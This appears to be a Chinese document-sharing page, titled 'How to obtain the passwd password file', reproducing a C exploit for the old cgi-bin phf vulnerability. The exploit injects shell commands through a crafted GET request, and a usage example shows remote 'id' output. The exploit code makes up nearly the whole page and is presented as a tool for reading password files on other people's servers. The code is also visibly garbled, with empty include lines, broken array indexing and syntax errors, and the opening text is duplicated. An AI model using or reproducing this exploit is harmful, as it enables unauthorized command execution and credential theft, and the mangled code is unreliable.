如何获取passwd密码档yu如何获取passwd密码档yu
phf.c
------ cut here----
/* Some small changes for efficiency by snocrash. */ /*
* cgi-bin phf exploit by loxsmith [xf]
*
* I wrote this in C because not every system is going to have lynx. Also,
* this saves the time it usually takes to reme...
如何获取passwd密码档yu
phf.c
------ cut here----
/* Some small changes for efficiency by snocrash. */ /*
* cgi-bin phf exploit by loxsmith [xf]
*
* I wrote this in C because not every system is going to have lynx. Also,
* this saves the time it usually takes to remember the syntatical format
* of the exploit. Because of the host lookup mess, this will take
* approximately 12 seconds to execute with average network load. Be patient.
*
*/
#include
#include
#include
#include
#include
#include
#include
int main(argc, argv)
int argc;
char **argv;
{
int i = 0, s, port, bytes = 128;
char exploit[0xff], buffer[128], hostname[256], *command, j[2];
struct sockaddr_in sin;
struct hostent *he;
if (argc != 3 && argc != 4) {
fprintf(stderr, "Usage: %s command hostname [port]", argv[0]); exit(1);
}
command = (char *)malloc(strlen(argv[1]) * 2);
while (argv[1] != '') {
if (argv[1] == 32) strcat(command, "%20"; else { sprintf(j, "%c", argv[1]);
strcat(command, j);
}
++i;
}
strcpy(hostname, argv[2]);
if (argc == 4) port = atoi(argv[3]); else port = 80;
if (sin.sin_addr.s_addr = inet_addr(hostname) == -1) { he = gethostbyname(hostname);
if (he) {
sin.sin_family = he->h_addrtype;
memcpy((caddr_t) &sin.sin_addr, he->h_addr_list[0], he->h_length);
} else {
fprintf(stderr, "%s: unknown host %s ", argv[0], hostname); exit(1);
}
}
sin.sin_family = AF_INET;
sin.sin_port = htons((u_short) port);
if ((s = socket(sin.sin_family, SOCK_STREAM, 0)) < 0) { fprintf(stderr, "%s: could not get socket ", argv[0]); exit(1);
}
if (connect(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) { close(s);
fprintf(stderr, "%s: could not establish connection ", argv[0]); exit(1);
}
sprintf(exploit, "GET /cgi-bin/phf/?Qalias=X%%0a%s ", command); free(command);
write(s, exploit, strlen(exploit));
while(bytes == 128) {
bytes = read(s, buffer, 128);
fprintf(stdout, buffer);
}
close(s);
}
-------- cut here
使用举例:
bash% phf id xxx.org
------
Query Results
/usr/local/bin/ph -m alias=X
id
uid=65534(nobody) gid=65535(nogroup) groups=65535(nogroup)
本文档为【如何获取passwd密码档yu】,请使用软件OFFICE或WPS软件打开。作品中的文字与图均可以修改和编辑,
图片更改请在作品中右键图片并更换,文字修改请直接点击文字进行修改,也可以新增和删除文档中的内容。
[版权声明] 本站所有资料为用户分享产生,若发现您的权利被侵害,请联系客服邮件isharekefu@iask.cn,我们尽快处理。
本作品所展示的图片、画像、字体、音乐的版权可能需版权方额外授权,请谨慎使用。
网站提供的党政主题相关内容(国旗、国徽、党徽..)目的在于配合国家政策宣传,仅限个人学习分享使用,禁止用于任何广告和商用目的。